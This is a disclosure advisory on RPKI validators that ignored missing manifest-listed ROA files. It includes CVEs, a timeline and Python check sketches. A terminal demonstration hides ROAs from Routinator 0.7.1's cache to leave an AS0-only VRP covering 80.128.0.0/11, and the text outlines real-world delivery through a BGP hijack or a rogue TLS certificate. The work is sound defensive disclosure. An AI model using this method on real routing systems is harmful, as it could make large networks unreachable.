Technical Security Advisory on RPKI Manifest Handling
=====================================================

Start Date:	February 26th, 2020
Last update:	October 30th, 2020
Contact:	Job Snijders <job@sobornost.net>

Vulnerable:	OctoRPKI up to 1.1.4
		RIPE NCC Validator up to 3.1
		Routinator up to 0.7.1
		FORT up to 1.2.0
		rpki-client 6.6

Not vulnerable: rpki-client 6.7		(March 2020)
		FORT 1.2.1		(April 2020)
		Routinator 0.8.0	(October 2020)
		RIPE NCC Validator 3.2	(October 2020)
		OctoRPKI 1.2.0		(October 2020)

Summary
=======

When it comes to cryptographic validation it is important for the RPKI / X.509
validator software to confirm whether all RPKI certificates and files
are current (not expired), valid (not malformed), and complete (integrity).
If to-be-validated RPKI information is expired and/or incomplete, it should
not be used in BGP routing decision making.

Network Operators generally expect RPKI to be secure by default. This places a
burden on RPKI software developers. Generally speaking, fixing security issues
of this magnitude should not take this long.

Background
==========

An RPKI Manifest makes it possible for validation software to react
sanely to RPKI data tampering. RPKI Manifests exist to *protect* both the
issuing Certificate Authority (CA) and the Relying Party (RP). Manifests
and strict X.509 handling are the *only* mechanism to verify a publication
point's completeness and integrity. Neither NLnet Labs', RIPE NCC's, nor
Cloudflare's software attached any consequence to integrity issues at an RPKI
publication point. All continued to emit as many VRPs as possible, regardless
of whether the publication point was complete to begin with!
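
As a rough illustration of what "attaching consequence" could look like, the
Python sketch below treats a publication point as all-or-nothing. It is not
taken from any of the validators named here: `missing_files`, `usable_roas`
and the `manifest_names` argument are hypothetical, and the sketch assumes the
file names were already extracted from a manifest that is itself valid and
current.

```python
from pathlib import Path


def missing_files(manifest_names, directory):
    """Return manifest-listed file names that are absent from `directory`."""
    present = {p.name for p in Path(directory).iterdir() if p.is_file()}
    return sorted(name for name in manifest_names if name not in present)


def usable_roas(manifest_names, directory):
    """All-or-nothing: return the .roa names only if nothing is missing."""
    if missing_files(manifest_names, directory):
        return []  # incomplete publication point: emit nothing from it
    return sorted(n for n in manifest_names if n.endswith(".roa"))
```

Under this policy a single missing file listed on the manifest is enough for
`usable_roas` to return an empty list, so no VRPs would be derived from the
remaining files.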

The data structure of Route Origin Authorizations (ROAs) allows only a
single origin ASN per .roa file. This means network operators who wish
to grant permission to multiple ASNs (a common example: their own and
their customers' ASNs) to originate parts of their IP space *have*
to create multiple .roa files. The IP block owner's routing intentions
can only be considered when the full bundle of .roa files is available.

Logically, when some .roa files are missing (which according to a valid
current manifest must be present), the remaining .roa files at the
publication point become useless as they represent an *incomplete*
overview of routing intentions; even worse those files flip from
'useless' to 'dangerous' when they are injected as VRPs into the
operator's routing system.
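
The flip from 'useless' to 'dangerous' can be sketched with a simplified
origin validation routine in the spirit of RFC 6811. This is an illustrative
sketch, not any router's implementation: the function name and the tuple
layout `(asn, prefix, max_length)` are assumptions, and the two VRPs are
taken from the demonstration transcript further down.

```python
import ipaddress


def origin_validation(prefix, origin_asn, vrps):
    """Return 'valid', 'invalid' or 'not-found' for one BGP route."""
    route = ipaddress.ip_network(prefix)
    covered = False
    for asn, vrp_prefix, max_len in vrps:
        vrp_net = ipaddress.ip_network(vrp_prefix)
        if route.version != vrp_net.version or not route.subnet_of(vrp_net):
            continue  # this VRP does not cover the route
        covered = True
        # AS 0 is never a legitimate origin, so an AS 0 VRP cannot match.
        if asn != 0 and asn == origin_asn and route.prefixlen <= max_len:
            return "valid"
    return "invalid" if covered else "not-found"


full = [(3320, "80.128.0.0/11", 11), (0, "80.128.0.0/11", 11)]
tampered = [(0, "80.128.0.0/11", 11)]  # only the AS 0 ROA is left visible

print(origin_validation("80.128.0.0/11", 3320, full))      # valid
print(origin_validation("80.128.0.0/11", 3320, tampered))  # invalid
print(origin_validation("80.128.0.0/11", 3320, []))        # not-found
```

With the complete set the route is valid, with the partial set it becomes
invalid (and is dropped under an 'invalid is reject' policy), and with no
VRPs at all it is merely not-found.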

Below is copy+pasted from a terminal transcript to demonstrate an
example attack. The attack scenario is greatly simplified to focus
purely on the manifest handling issue. The attack can be executed by
Monkeys-In-The-Middle. The lines prefixed with ### are my comments, the
lines without are copy+pasted from a terminal.

At the moment of writing, the manifest handling issue works against
versions of RIPE NCC's validator prior to 3.2, Cloudflare's OctoRPKI 1.1.X,
and NLnet Labs' Routinator up to 0.7.1.  Current versions of OpenBSD
rpki-client and the FORT validator are not susceptible to this issue.

The objective here is for RPKI Relying Parties to *not* introduce
additional security issues in the global routing system by deploying
RPKI ROV, as that would undo years of work from all of us. :-)

Timeline:

    26-feb-2020 - NLNetlabs/RIPE NCC/Cloudflare/FORT/world informed via SIDROPS discussions
                  https://mailarchive.ietf.org/arch/msg/sidrops/j_ROy0fyYtHXaKmB6BRwJ6eFl1k/
    23-mar-2020 - opened issue with FORT for tracking
                  https://github.com/NICMx/FORT-validator/issues/28
    23-mar-2020 - opened issue with Cloudflare for tracking
                  https://github.com/cloudflare/cfrpki/issues/38
    28-mar-2020 - github issue opened with NLNetlabs for tracking
                  https://github.com/NLnetLabs/routinator/issues/319
    30-mar-2020 - github issue opened with RIPE NCC for tracking
                  https://github.com/RIPE-NCC/rpki-validator-3/issues/162 (now closed)
                  reopened as https://github.com/RIPE-NCC/rpki-validator-3/issues/232
    07-jul-2020 - RIPE NCC has developed a fix, but it is not enabled by default, leaving
                  users vulnerable to the missing file attack.
                  https://github.com/RIPE-NCC/rpki-validator-3/issues/232
    30-jul-2020 - CVE-2020-16164 was published (curiously logged as 'Disputed')
                  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16164
    --> elapsed time > 6 months --> 
    05-aug-2020 - CVE-2020-17366 was published
                  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17366
    27-aug-2020 - NLNetLabs started work on a fix
                  https://github.com/NLnetLabs/routinator/pull/371
    19-oct-2020 - NLNetLabs releases Routinator 0.8.0 which addresses CVE-2020-17366
                  https://nlnetlabs.nl/projects/rpki/security-advisories/
    29-oct-2020 - RIPE NCC releases version 3.2 which addresses CVE-2020-16164
    29-oct-2020 - Cloudflare releases OctoRPKI 1.2.0 (which fixes the observed issue)

Can RPKI ROAs easily be deleted / hidden from view?
---------------------------------------------------

Yes, a Malicious-In-The-Middle can hide ROAs: neither RSYNC nor RRDP has authentication
built in. It is also possible for a CA operator to make a mistake. For example, on April
1st, 2020 the RIPE NCC inadvertently deleted ~ 2,600 ROAs:

	https://labs.ripe.net/Members/nathalie_nathalie/lessons-learned-on-improving-rpki

Demonstration
-------------

### today's date

job@bench ~$ date
Wed Sep 30 17:05:40 UTC 2020

job@bench ~$ mkdir manifest-demo && cd manifest-demo

### download vulnerable release:

job@bench manifest-demo$ ftp https://github.com/NLnetLabs/routinator/archive/v0.7.1.tar.gz
Trying 140.82.121.3...
Requesting https://github.com/NLnetLabs/routinator/archive/v0.7.1.tar.gz
Redirected to https://codeload.github.com/NLnetLabs/routinator/tar.gz/v0.7.1
Trying 140.82.121.10...
Requesting https://codeload.github.com/NLnetLabs/routinator/tar.gz/v0.7.1
117082 bytes received in 0.11 seconds (1018.36 KB/s)

### unpack 

job@bench manifest-demo$ tar fxz v0.7.1.tar.gz

### go into routinator source code dir & build routinator

job@bench manifest-demo$ cd routinator-0.7.1/
job@bench routinator-0.7.1$ cargo build
  Downloaded remove_dir_all v0.5.2
  Downloaded hyper-rustls v0.20.0
  Downloaded signal-hook-registry v1.2
  ... snip ...

### make data repository directory & tal dir

job@bench routinator-0.7.1$ mkdir ../repository ../tals

### for this demo we only use the RIPE TAL, copy it to location

job@bench routinator-0.7.1$ cp /etc/rpki/ripe.tal ../tals/

### run routinator and force use of rsync to keep the demonstration simple
### this attack also works via RRDP (as RRDP is conceptually the same as rsync
### and has similar weaknesses, but is transported via HTTPS)
###
### the following is the EXPECTED outcome, in this example I use 
### Deutsche Telekom prefixes, as those are an easy victim target

job@bench routinator-0.7.1$ ./target/debug/routinator --disable-rrdp -b ../ vrps --format csv | grepcidr 80.128.0.0/11
rsync://rpki.admin.freerangecloud.com/repo: failed with status exit code: 35
rsync://rpki.admin.freerangecloud.com/repo: rsync error: timeout waiting for daemon connection (code 35) at socket.c(278) [Receiver=3.2.3]
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.mft: stale manifest
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.crl: stale CRL.
AS3320,80.156.0.0/16,16,ripe
AS6878,80.158.31.0/24,24,ripe
AS0,80.128.0.0/11,11,ripe
AS3320,80.157.0.0/16,16,ripe
AS3320,80.157.8.0/21,21,ripe
AS6878,80.158.72.0/21,24,ripe
AS6878,80.158.96.0/19,24,ripe
AS3320,80.128.0.0/11,11,ripe
AS6878,80.158.32.0/19,24,ripe
AS3320,80.157.16.0/20,20,ripe
AS3320,80.152.0.0/14,14,ripe
AS34086,80.158.0.0/17,24,ripe
AS3320,80.128.0.0/12,12,ripe
AS6878,80.158.0.0/23,23,ripe
AS6878,80.158.0.0/21,24,ripe
AS6878,80.158.16.0/20,24,ripe
AS3320,80.144.0.0/13,13,ripe
AS6878,80.158.80.0/20,24,ripe
AS2792,80.159.224.0/19,24,ripe

### let's inspect what the manifest tells us to expect in the directory where the CA is stored

job@bench $ /usr/src/regress/usr.sbin/rpki-client/test-mft -v 1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft
Subject key identifier: 1F:2A:79:C9:90:36:EA:61:F5:81:8A:C3:6E:71:39:D2:C0:61:D4:78
Authority key identifier: FA:D7:10:0E:77:ED:91:19:D6:6E:23:21:BB:67:11:D7:E7:60:98:2B
    1: 1-tcQDnftkRnWbiMhu2cR1-dgmCs.crl
        hash XilzzatUxOVfY5O4x9j+xfmWrBZMgTWMlkgYL9MBru4=
    2: IM3xMiMU1QChuWMOGgnbDwYolrU.roa
        hash RK6exg3NDk8p1toCRGSDay+Wsd6Swz3VuBVIoxGQrl8=
    3: KoSqIaefMEsPiFenDxTKDny_uOk.roa
        hash ZJ1TcqgEeKMva1etur+2quN4EnVAkMLhRmX3y29+omk=
    4: LkKeUPYrfgzjsOIejLjsHGk44cU.roa
        hash V8mgfSbK9K0mtwys1xgGtWxuHWrZ0bZhDTFnBZ+xYVE=
    5: NpI_Uj3OZb6jvwfUTX0-eOk9QV4.roa
        hash E1cPbtWB76l7Wnog2wdVQFNrud/387HdZPmq2cqOyzk=
    6: fIeCcC8KpdJQd-olU2APdxNZkyA.roa
        hash Y31uvYhDrPuXNaEAe02iUa5rEGRmRrgTs7vzTQ/TA+0=
    7: r5vtD4isKhTzGXNGulSnZ7XCS04.roa
        hash NeF/YRK86bfYc19JGghWT54o/Q94FW6mbmpv/d55+uM=
    8: r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa
        hash nPtvIkHqTaohIwFDpvWgUA+LlKy2wKQ27aK18Bv75lo=

### as seen above there are multiple .roa files expected to exist, for each .roa file
### a hash is provided so one can cryptographically verify that the file at hand
### is the file that the CA intended to publish via RRDP or RSYNC.
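###
### a minimal sketch of that per-file check in Python, assuming the hash shown
### above is the base64-encoded SHA-256 digest of the file (the digest RPKI
### manifests use); manifest_hash() and matches_manifest() are hypothetical
### helper names and not part of rpki-client or any other validator

```python
import base64
import hashlib


def manifest_hash(path):
    """Base64 of the file's SHA-256 digest, in the format listed above."""
    with open(path, "rb") as f:
        digest = hashlib.sha256(f.read()).digest()
    return base64.b64encode(digest).decode("ascii")


def matches_manifest(path, expected_b64):
    """True only if the file exists and its hash equals the manifest entry."""
    try:
        return manifest_hash(path) == expected_b64
    except FileNotFoundError:
        return False  # a listed file that is absent fails the check
```

### a missing file and a modified file both fail this check, which is the
### signal a validator needs in order to distrust the publication point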

### ATTACK STARTS
###
### now we simulate the monkey-in-the-middle attack
### I could either set up an in-the-middle rsync server, or tinker with the RRDP transport
### instead, we skip that step and just remove the victim ROAs from the cache
###
### the DTAG CA is stored in ../repository/rsync/rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/*.{crl,mft,roa}
### as each .roa file can only contain 1 Origin ASN, but multiple prefixes, as attacker we'll hide
### all .roa files from the view of the validator except the one that lists AS 0 as the origin for 80.128.0.0/11
### let's show the ROA we want to misuse

job@bench $ test-roa -v ../repository/rsync/rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa
Subject key identifier:
AF:B4:D2:C9:69:FF:19:B6:0F:8C:D5:AF:B7:8A:F9:7B:04:8D:02:C9
Authority key identifier:
FA:D7:10:0E:77:ED:91:19:D6:6E:23:21:BB:67:11:D7:E7:60:98:2B
asID: 0
    1: 80.128.0.0/11 (max: 11)
OK

### We remove all but r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa from the validator's view.
### Again - this is trivial to do on the internet as MITM

job@bench routinator-0.7.1$ rsync -r --delete -v \
	--exclude=*.crl --exclude=*.mft --exclude=r7TSyWn_GbYPjNWvt4r5ewSNAsk.roa \
	/var/empty/ \
	../repository/rsync/rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/
sending incremental file list
deleting r5vtD4isKhTzGXNGulSnZ7XCS04.roa
deleting fIeCcC8KpdJQd-olU2APdxNZkyA.roa
deleting NpI_Uj3OZb6jvwfUTX0-eOk9QV4.roa
deleting LkKeUPYrfgzjsOIejLjsHGk44cU.roa
deleting KoSqIaefMEsPiFenDxTKDny_uOk.roa
deleting IM3xMiMU1QChuWMOGgnbDwYolrU.roa

### now we run the validation process again, but this time with the '-n' option
### to force the validator to use the (manipulated) local cache
###
### as can be observed, a single VRP is emitted with AS 0

job@bench routinator-0.7.1$ ./target/debug/routinator --disable-rrdp  -b ../ vrps -n --format csv | grepcidr 80.128.0.0/11
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.mft: stale manifest
rsync://rpkica.mckay.com/rpki/MCnet/Jp4Tjp_GB5I1RfeaOGhKZNlDmAQ.crl: stale CRL.
AS0,80.128.0.0/11,11,ripe

### the above SINGLE vrp will cause a network with 'invalid is reject' EBGP policies to
### REJECT all BGP routes matching or more-specific to 80.128.0.0/11
### at that point half of Germany is unreachable as 80.128.0.0/11 contains
### 2,097,152 IPv4 addresses which represents a lot of businesses & households
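###
### the size and extent of that /11 can be checked with Python's standard
### ipaddress module; this is only a sanity-check sketch, and the /24 used
### below is one of the prefixes from the routinator output earlier on

```python
import ipaddress

net = ipaddress.ip_network("80.128.0.0/11")

# A /11 leaves 32 - 11 = 21 host bits, so 2 ** 21 addresses.
print(net.num_addresses)        # 2097152
print(net.broadcast_address)    # 80.159.255.255

# Any more-specific inside the /11 is covered by the AS 0 VRP as well.
print(ipaddress.ip_network("80.158.31.0/24").subnet_of(net))  # True
```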

### in contrast, rpki-client operating on the same manipulated cache will *NOT*
### emit any VRPs, as OpenBSD rpki-client recognises via the manifest that some
### (important) files are missing
### just like in the previous example with routinator, we run rpki-client with '-n'
### so it uses the *exact same* RPKI input data as routinator did

job@bench $ rpki-client -d /home/job/manifest-demo/repository/rsync -n -t ../tals/ripe.tal -c -v ../
rpki-client: rpki.ripe.net/ta: using cache
rpki-client: rpki.ripe.net/repository: using cache
rpki-client: nostromo.heficed.net/repo: using cache
rpki-client: rsync.rpki.nlnetlabs.nl/repo: using cache
rpki-client: rpki.admin.freerangecloud.com/repo: using cache
rpki-client: rpkica.mckay.com/rpki: using cache
rpki-client: rsync.rpki.a2b-internet.com/repo: using cache
rpki-client: rpki.xindi.eu/repo: using cache
rpki-client: ca.rg.net/rpki: using cache
rpki-client: rpki.qs.nu/repo: using cache
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file IM3xMiMU1QChuWMOGgnbDwYolrU.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file KoSqIaefMEsPiFenDxTKDny_uOk.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file LkKeUPYrfgzjsOIejLjsHGk44cU.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file NpI_Uj3OZb6jvwfUTX0-eOk9QV4.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file fIeCcC8KpdJQd-olU2APdxNZkyA.roa: No such file or directory
rpki-client: rpki.ripe.net/repository/DEFAULT/3e/01d411-d915-4277-8fe2-76b0dda2bf3e/1/1-tcQDnftkRnWbiMhu2cR1-dgmCs.mft: referenced file r5vtD4isKhTzGXNGulSnZ7XCS04.roa: No such file or directory
rpki-client: rpki.admin.freerangecloud.com/repo/FRC-CA/1/DC9B0FC0FAE1CB3BD28B9D01AAFC3563FDA951DA.mft: No such file or directory
rpki-client: rpkica.mckay.com/rpki/MCnet/UEh2SAvdIgPsUFdv92RSSaNqBnY.mft: No such file or directory
rpki-client: cc.rg.net/rpki: using cache
rpki-client: cb.rg.net/rpki: using cache
rpki-client: all files parsed: generating output
rpki-client: Route Origin Authorizations: 18582 (0 failed parse, 0 invalid)
rpki-client: Certificates: 12813 (0 failed parse, 0 invalid)
rpki-client: Trust Anchor Locators: 1
rpki-client: Manifests: 12813 (3 failed parse, 0 stale)
rpki-client: Certificate revocation lists: 12810
rpki-client: Repositories: 12
rpki-client: Files removed: 373
rpki-client: VRP Entries: 98353 (98353 unique)

### in the above output one can see that the client emitted errors about missing files
### routinator did *not* emit any errors or warnings that .roa files were missing

### if we inspect the rpki-client output for any VRPs contained within 80.128.0.0/11
### the output is EMPTY, this means that *NO VRPs* related to 80.128.0.0/11 were
### injected into the BGP system

job@bench $ grepcidr 80.128.0.0/11 ../csv
job@bench $

### No VRPs at all for the busted publication point is safer than an incomplete set of VRPs!

### DEMO PARAMETERS
### In the real world one has to do some work to set up the monkey-in-the-middle
### attack. An attacker could combine a Kapela-Pilosov BGP attack and either
### pretend to be an rsync server or obtain a WebPKI TLS certificate for
### rpki.ripe.net via a shady TLS root (like diginotar). The attacker doing MITM
### could block port 443 to force a downgrade to rsync.
### rpki.ripe.net is not well-peered, so spoofing the origin and 'winning' the
### traffic via a Kapela-Pilosov attack is not all too hard.
### THIS ATTACK IS TRIVIAL
###
### CONCLUSION
###
### routinator 0.7.1 will emit VRPs based on incomplete data. In some scenarios
### this can lead to loss of connectivity towards (important) destinations,
### because BGP routes flip from VALID to INVALID when the router only
### sees the VRPs resulting from the single .roa file that the attacker wishes
### the victim to see.
###
### In contrast, routinator 0.8.0, rpki-client or FORT will *not* emit VRPs if files
### that must exist according to the manifest don't exist. This causes BGP routes to
### flip from VALID to NOT-FOUND, which is safer. Any problem in RPKI data MUST
### result in 'not-found', not in 'invalid'.
###
###
### UPGRADE YOUR VALIDATOR